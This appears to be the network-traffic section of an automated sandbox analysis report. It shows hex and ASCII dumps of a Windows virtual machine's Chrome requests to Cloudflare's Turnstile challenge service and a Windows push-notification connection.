                                                          2024-01-24 14:34:04 UTC804OUTGET /cdn-cgi/challenge-platform/h/g/pat/84a8fe9b2b47507e/1706106840301/fdc164c912d01ac111ebb61588bbd64cfefffb90b726ec87368a6336ce872d90/dpaCGNz7ndiTzaL HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:04 UTC152INHTTP/1.1 401 Unauthorized
                                                          Date: Wed, 24 Jan 2024 14:34:04 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-01-24 14:34:04 UTC1374INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 5f 63 46 6b 79 52 4c 51 47 73 45 52 36 37 59 56 69 4c 76 57 54 50 37 5f 2d 35 43 33 4a 75 79 48 4e 6f 70 6a 4e 73 36 48 4c 5a 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 67
                                                          Data Ascii: www-authenticate: PrivateToken challenge=AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g_cFkyRLQGsER67YViLvWTP7_-5C3JuyHNopjNs6HLZAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=, token-key=MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAg
                                                          2024-01-24 14:34:04 UTC6INData Raw: 31 0d 0a 4a 0d 0a
                                                          Data Ascii: 1J
                                                          2024-01-24 14:34:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          19192.168.2.64974020.25.241.18443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:04 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 59 55 33 78 66 46 6b 6a 6b 43 47 49 39 67 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 39 61 65 65 39 64 38 39 65 38 64 66 63 65 34 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 305MS-CV: KYU3xfFkjkCGI9gk.1Context: 49aee9d89e8dfce4
                                                          2024-01-24 14:34:04 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                          2024-01-24 14:34:04 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4b 59 55 33 78 66 46 6b 6a 6b 43 47 49 39 67 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 39 61 65 65 39 64 38 39 65 38 64 66 63 65 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 77 2b 31 66 33 69 61 34 31 7a 5a 2b 77 76 46 41 79 4c 6a 79 4a 4f 35 78 62 41 42 68 6e 53 35 76 63 2f 63 50 34 66 65 41 6f 6c 56 30 51 4e 33 4a 6d 36 57 4e 72 67 4f 55 68 2f 76 6b 32 6c 34 42 67 2b 31 68 66 65 76 67 39 4b 67 31 59 53 55 5a 62 30 41 48 4c 79 53 39 58 33 6e 71 77 37 45 55 67 38 4e 78 67 62 61 6f 56 6a 6d 77
                                                          Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: KYU3xfFkjkCGI9gk.2Context: 49aee9d89e8dfce4<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARw+1f3ia41zZ+wvFAyLjyJO5xbABhnS5vc/cP4feAolV0QN3Jm6WNrgOUh/vk2l4Bg+1hfevg9Kg1YSUZb0AHLyS9X3nqw7EUg8NxgbaoVjmw
                                                          2024-01-24 14:34:04 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4b 59 55 33 78 66 46 6b 6a 6b 43 47 49 39 67 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 39 61 65 65 39 64 38 39 65 38 64 66 63 65 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: KYU3xfFkjkCGI9gk.3Context: 49aee9d89e8dfce4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                          2024-01-24 14:34:04 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2024-01-24 14:34:04 UTC58INData Raw: 4d 53 2d 43 56 3a 20 51 4d 32 38 45 75 76 6c 34 55 32 49 78 7a 53 4a 64 59 4f 79 44 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: QM28Euvl4U2IxzSJdYOyDA.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.649741104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:05 UTC775OUTGET /cdn-cgi/challenge-platform/h/g/i/84a8fe9b2b47507e/1706106840303/7tvwTEIxaRkEWV- HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:05 UTC208INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:05 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fec6db4ead86-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:05 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 59 08 02 00 00 00 31 5e a4 fb 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                          Data Ascii: 3dPNGIHDRZY1^IDAT$IENDB`
                                                          2024-01-24 14:34:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.649743104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:06 UTC916OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 28510
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: 2f47f656679f8e4
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:06 UTC16384OUTData Raw: 76 5f 38 34 61 38 66 65 39 62 32 62 34 37 35 30 37 65 3d 61 6f 59 4f 56 38 4e 24 39 6e 59 4d 50 73 65 4c 67 4e 67 46 59 4c 41 4e 41 6e 42 25 32 62 42 6a 4f 73 6f 42 4b 42 35 4f 73 59 38 4b 62 42 58 38 42 4c 34 56 6f 4e 48 47 42 43 4f 6c 6f 42 64 49 42 76 4f 46 63 59 6c 59 42 61 59 37 42 37 4f 73 66 72 65 73 64 59 4e 4b 38 42 67 50 4e 74 42 43 50 4e 78 46 42 42 6f 42 79 4e 5a 50 42 71 34 71 34 4e 78 78 4b 42 6c 63 6c 36 67 42 73 71 4b 42 6b 48 48 4f 77 65 42 61 39 4f 42 61 58 44 53 46 42 79 4f 42 78 37 76 63 41 35 58 4b 73 6c 43 35 6f 34 62 6e 45 73 34 42 62 68 43 63 46 4f 6d 6a 38 62 42 4c 6c 45 43 4e 77 69 4f 42 35 37 4f 42 67 42 59 63 46 68 4d 65 42 57 4f 4e 33 52 66 56 57 49 50 74 63 67 69 65 42 33 5a 53 32 68 46 72 52 54 34 72 63 30 6d 4b 31 45 66 72
                                                          Data Ascii: v_84a8fe9b2b47507e=aoYOV8N$9nYMPseLgNgFYLANAnB%2bBjOsoBKB5OsY8KbBX8BL4VoNHGBCOloBdIBvOFcYlYBaY7B7OsfresdYNK8BgPNtBCPNxFBBoByNZPBq4q4NxxKBlcl6gBsqKBkHHOweBa9OBaXDSFByOBx7vcA5XKslC5o4bnEs4BbhCcFOmj8bBLlECNwiOB57OBgBYcFhMeBWON3RfVWIPtcgieB3ZS2hFrRT4rc0mK1Efr
                                                          2024-01-24 14:34:06 UTC12126OUTData Raw: 43 71 70 4b 4e 70 34 78 41 77 39 61 6d 75 58 75 78 4f 69 42 59 42 77 42 64 4f 4e 65 4e 64 42 50 4f 42 72 4e 63 34 2b 30 38 37 4e 56 39 38 4f 73 64 4e 57 42 67 4f 6e 61 51 78 42 2b 4f 4c 24 42 34 42 42 34 6c 78 4f 74 42 46 34 73 42 38 6e 42 63 34 43 66 42 79 42 64 42 42 72 4e 52 37 59 37 4e 64 42 65 42 24 37 38 4f 4e 70 42 73 42 6e 4b 37 58 42 62 34 73 39 45 70 34 46 48 76 6f 42 33 6f 66 4f 42 67 42 79 4f 38 76 72 57 4e 41 4f 42 57 43 69 4e 52 37 73 39 4c 49 45 50 39 35 39 6e 72 42 66 42 42 57 43 50 38 34 42 4c 34 42 72 42 47 42 62 37 73 5a 42 62 4f 69 34 6c 24 4e 6c 42 6b 4f 6b 50 38 30 42 6f 34 4e 34 4e 67 42 6a 4f 61 6f 4c 31 42 37 34 67 73 4c 7a 42 45 58 6c 50 4c 78 42 4a 4f 6b 65 38 47 42 76 4f 67 73 42 6e 42 39 34 6b 73 38 74 42 37 6c 6e 66 38 51 42
                                                          Data Ascii: CqpKNp4xAw9amuXuxOiBYBwBdONeNdBPOBrNc4+087NV98OsdNWBgOnaQxB+OL$B4BB4lxOtBF4sB8nBc4CfByBdBBrNR7Y7NdBeB$78ONpBsBnK7XBb4s9Ep4FHvoB3ofOBgByO8vrWNAOBWCiNR7s9LIEP959nrBfBBWCP84BL4BrBGBb7sZBbOi4l$NlBkOkP80Bo4N4NgBjOaoL1B74gsLzBEXlPLxBJOke8GBvOgsBnB94ks8tB7lnf8QB


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.649744104.17.3.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:06 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/84a8fe9b2b47507e/1706106840303/7tvwTEIxaRkEWV- HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:06 UTC208INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:06 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fece3f1d244a-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:06 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 59 08 02 00 00 00 31 5e a4 fb 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                          Data Ascii: 3dPNGIHDRZY1^IDAT$IENDB`
                                                          2024-01-24 14:34:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.649746104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:08 UTC916OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 28510
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: 2f47f656679f8e4
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:08 UTC16384OUTData Raw: 76 5f 38 34 61 38 66 65 39 62 32 62 34 37 35 30 37 65 3d 61 6f 59 4f 56 38 4e 24 39 6e 59 4d 50 73 65 4c 67 4e 67 46 59 4c 41 4e 41 6e 42 25 32 62 42 6a 4f 73 6f 42 4b 42 35 4f 73 59 38 4b 62 42 58 38 42 4c 34 56 6f 4e 48 47 42 43 4f 6c 6f 42 64 49 42 76 4f 46 63 59 6c 59 42 61 59 37 42 37 4f 73 66 72 65 73 64 59 4e 4b 38 42 67 50 4e 74 42 43 50 4e 78 46 42 42 6f 42 79 4e 5a 50 42 71 34 71 34 4e 78 78 4b 42 6c 63 6c 36 67 42 73 71 4b 42 6b 48 48 4f 77 65 42 61 39 4f 42 61 58 44 53 46 42 79 4f 42 78 37 76 63 41 35 58 4b 73 6c 43 35 6f 34 62 6e 45 73 34 42 62 68 43 63 46 4f 6d 6a 38 62 42 4c 6c 45 43 4e 77 69 4f 42 35 37 4f 42 67 42 59 63 46 68 4d 65 42 57 4f 4e 33 52 66 56 57 49 50 74 63 67 69 65 42 33 5a 53 32 68 46 72 52 54 34 72 63 30 6d 4b 31 45 66 72
                                                          Data Ascii: v_84a8fe9b2b47507e=aoYOV8N$9nYMPseLgNgFYLANAnB%2bBjOsoBKB5OsY8KbBX8BL4VoNHGBCOloBdIBvOFcYlYBaY7B7OsfresdYNK8BgPNtBCPNxFBBoByNZPBq4q4NxxKBlcl6gBsqKBkHHOweBa9OBaXDSFByOBx7vcA5XKslC5o4bnEs4BbhCcFOmj8bBLlECNwiOB57OBgBYcFhMeBWON3RfVWIPtcgieB3ZS2hFrRT4rc0mK1Efr
                                                          2024-01-24 14:34:08 UTC12126OUTData Raw: 43 71 70 4b 4e 70 34 78 41 77 39 61 6d 75 58 75 78 4f 69 42 59 42 77 42 64 4f 4e 65 4e 64 42 50 4f 42 72 4e 63 34 2b 30 38 37 4e 56 39 38 4f 73 64 4e 57 42 67 4f 6e 61 51 78 42 2b 4f 4c 24 42 34 42 42 34 6c 78 4f 74 42 46 34 73 42 38 6e 42 63 34 43 66 42 79 42 64 42 42 72 4e 52 37 59 37 4e 64 42 65 42 24 37 38 4f 4e 70 42 73 42 6e 4b 37 58 42 62 34 73 39 45 70 34 46 48 76 6f 42 33 6f 66 4f 42 67 42 79 4f 38 76 72 57 4e 41 4f 42 57 43 69 4e 52 37 73 39 4c 49 45 50 39 35 39 6e 72 42 66 42 42 57 43 50 38 34 42 4c 34 42 72 42 47 42 62 37 73 5a 42 62 4f 69 34 6c 24 4e 6c 42 6b 4f 6b 50 38 30 42 6f 34 4e 34 4e 67 42 6a 4f 61 6f 4c 31 42 37 34 67 73 4c 7a 42 45 58 6c 50 4c 78 42 4a 4f 6b 65 38 47 42 76 4f 67 73 42 6e 42 39 34 6b 73 38 74 42 37 6c 6e 66 38 51 42
                                                          Data Ascii: CqpKNp4xAw9amuXuxOiBYBwBdONeNdBPOBrNc4+087NV98OsdNWBgOnaQxB+OL$B4BB4lxOtBF4sB8nBc4CfByBdBBrNR7Y7NdBeB$78ONpBsBnK7XBb4s9Ep4FHvoB3ofOBgByO8vrWNAOBWCiNR7s9LIEP959nrBfBBWCP84BL4BrBGBb7sZBbOi4l$NlBkOkP80Bo4N4NgBjOaoL1B74gsLzBEXlPLxBJOke8GBvOgsBnB94ks8tB7lnf8QB
                                                          2024-01-24 14:34:09 UTC327INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:09 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-chl-gen: /HIEcTkzyP6+yhqaOg+1nGTuieAzh+BFBhT1OQ3wsf+LWXAr1FexrBj9+5n6RkS8$GgFRhfD014LIpIlrOhj4bA==
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fedd6b79675c-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:09 UTC1042INData Raw: 34 37 38 30 0d 0a 66 4c 69 38 75 35 39 37 66 61 2b 77 70 36 4c 43 74 59 54 4b 77 34 71 5a 68 34 79 46 77 70 33 56 6f 71 4c 58 74 71 65 36 31 63 2b 79 7a 4a 65 78 35 4e 33 53 35 36 61 37 31 75 75 6f 36 4e 57 6f 71 36 4c 45 33 74 32 6d 73 50 50 41 39 75 36 35 7a 4d 54 5a 37 39 4c 4e 75 67 54 43 42 63 54 56 30 65 48 68 41 64 62 56 35 66 6e 76 2b 65 67 54 35 68 4d 41 36 2b 63 5a 30 41 66 52 44 52 41 53 38 76 6f 4d 44 76 49 65 2f 42 7a 36 4a 78 54 39 2f 68 37 35 47 77 51 61 43 53 6b 48 4d 79 41 4b 41 79 6f 47 4a 77 38 6d 46 54 49 54 50 79 77 58 46 41 34 4f 48 50 30 43 46 45 77 4a 54 51 30 65 48 42 73 6d 50 79 55 66 53 45 30 72 57 55 78 5a 4b 6b 64 59 4e 6a 77 5a 46 45 35 44 4f 43 34 35 58 54 68 53 61 46 31 49 4c 6b 35 50 54 44 45 73 53 53 78 50 51 45 31 74 4e
                                                          Data Ascii: 4780fLi8u597fa+wp6LCtYTKw4qZh4yFwp3VoqLXtqe61c+yzJex5N3S56a71uuo6NWoq6LE3t2msPPA9u65zMTZ79LNugTCBcTV0eHhAdbV5fnv+egT5hMA6+cZ0AfRDRAS8voMDvIe/Bz6JxT9/h75GwQaCSkHMyAKAyoGJw8mFTITPywXFA4OHP0CFEwJTQ0eHBsmPyUfSE0rWUxZKkdYNjwZFE5DOC45XThSaF1ILk5PTDEsSSxPQE1tN
                                                          2024-01-24 14:34:09 UTC1369INData Raw: 66 62 6e 44 69 73 43 4f 67 35 47 4a 74 4d 79 76 77 63 76 47 6c 62 7a 45 32 39 37 54 6d 73 33 41 6d 35 75 35 30 74 66 70 71 4c 6d 71 6f 71 4f 37 37 75 72 48 76 4d 7a 48 74 65 53 30 79 66 62 54 73 76 66 70 33 4e 33 52 2f 4f 50 30 38 62 66 43 34 51 72 47 42 4e 6f 4d 44 2b 66 48 41 39 76 72 46 4e 33 56 34 64 4c 35 2b 4f 33 62 7a 74 63 63 44 4e 72 59 46 67 38 65 46 64 2f 38 35 67 6a 6b 47 51 67 49 35 41 34 41 2f 67 34 65 44 44 45 32 4a 79 4d 69 4e 77 67 4f 4d 44 58 39 49 52 37 36 4c 43 34 69 46 52 59 79 4a 68 6c 41 4e 69 6f 65 48 6a 6f 75 49 6b 67 2b 4d 69 59 32 51 6a 59 72 4b 6b 59 36 4c 68 6c 4b 50 6a 4e 43 54 6b 49 33 49 6d 59 30 48 56 6b 39 59 47 70 70 51 57 56 65 59 30 39 75 55 6a 4d 72 64 32 6c 62 61 58 35 76 59 57 31 65 51 59 46 4f 54 6c 35 51 64 49 65
                                                          Data Ascii: fbnDisCOg5GJtMyvwcvGlbzE297Tms3Am5u50tfpqLmqoqO77urHvMzHteS0yfbTsvfp3N3R/OP08bfC4QrGBNoMD+fHA9vrFN3V4dL5+O3bztccDNrYFg8eFd/85gjkGQgI5A4A/g4eDDE2JyMiNwgOMDX9IR76LC4iFRYyJhlANioeHjouIkg+MiY2QjYrKkY6LhlKPjNCTkI3ImY0HVk9YGppQWVeY09uUjMrd2lbaX5vYW1eQYFOTl5QdIe
                                                          2024-01-24 14:34:09 UTC1369INData Raw: 5a 32 4f 71 62 53 6b 30 34 2f 53 77 37 4f 36 79 37 76 50 7a 64 7a 4b 30 39 57 33 77 4a 37 47 74 2b 66 68 32 4e 71 70 37 71 62 75 38 62 4f 2f 77 72 54 6a 7a 2b 71 35 35 37 4c 34 38 39 4c 54 7a 4d 76 30 42 64 62 77 78 38 66 30 78 4e 62 55 33 77 54 66 43 51 38 45 46 64 54 30 39 65 58 51 30 50 63 4b 47 2b 63 4a 33 67 4c 67 2f 65 48 37 45 2f 55 54 49 79 6a 30 49 79 30 41 4b 4f 72 76 35 78 44 72 4b 42 51 4e 45 79 66 35 42 67 51 4f 50 7a 34 31 51 42 6f 39 42 41 51 78 41 44 6b 52 48 45 41 63 52 55 74 41 55 52 45 78 4d 67 30 70 45 43 78 4b 45 42 49 78 4a 46 73 6f 53 52 39 43 49 54 35 4e 50 46 4d 32 55 31 74 6f 4e 57 4e 74 51 47 67 72 4d 43 68 51 4c 55 4a 68 56 45 56 52 4e 46 68 45 54 54 68 59 53 33 39 43 57 7a 74 41 57 6b 2b 43 58 33 74 30 51 33 68 68 61 6c 78 6d
                                                          Data Ascii: Z2OqbSk04/Sw7O6y7vPzdzK09W3wJ7Gt+fh2Nqp7qbu8bO/wrTjz+q557L489LTzMv0Bdbwx8f0xNbU3wTfCQ8EFdT09eXQ0PcKG+cJ3gLg/eH7E/UTIyj0Iy0AKOrv5xDrKBQNEyf5BgQOPz41QBo9BAQxADkRHEAcRUtAURExMg0pECxKEBIxJFsoSR9CIT5NPFM2U1toNWNtQGgrMChQLUJhVEVRNFhETThYS39CWztAWk+CX3t0Q3hhalxm
                                                          2024-01-24 14:34:09 UTC1369INData Raw: 65 54 73 5a 57 74 6c 4c 75 58 6f 4a 6a 42 77 72 6e 6d 77 39 7a 64 79 62 6e 4a 32 65 69 39 70 64 32 78 77 4d 32 76 34 4d 76 42 78 50 58 49 31 4f 62 64 30 76 37 6f 32 62 72 7a 2f 4c 2f 5a 2b 39 4c 59 34 4e 30 4a 78 4f 44 6e 2b 4f 4d 4b 2f 65 6a 78 36 39 58 78 42 2b 38 64 45 4e 54 39 2f 76 55 64 41 42 6a 67 42 42 4d 54 48 78 38 4d 34 51 45 62 37 75 58 6e 45 77 59 6a 36 2b 77 48 45 76 4d 62 43 44 73 72 50 77 77 31 50 69 41 56 47 6a 55 47 49 51 41 67 53 44 52 49 2f 69 4d 71 4d 45 38 70 45 31 4d 53 45 55 38 57 4d 42 67 61 56 6a 4d 74 57 46 6f 31 54 6b 30 31 4e 6d 63 6a 4d 53 4e 55 5a 52 34 39 57 53 67 75 53 47 46 47 63 6c 39 48 53 47 67 77 63 45 35 37 4f 48 5a 35 51 44 68 2f 54 49 4e 4e 63 6c 70 69 59 58 31 64 5a 6e 75 4e 58 6f 42 4b 59 6c 42 4b 61 57 71 52 6a
